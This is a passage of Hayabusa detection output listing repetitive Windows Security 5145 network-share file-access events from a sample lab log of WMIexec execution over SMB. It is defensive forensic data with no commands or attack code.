Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 : IP 
Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 : IP Address: 
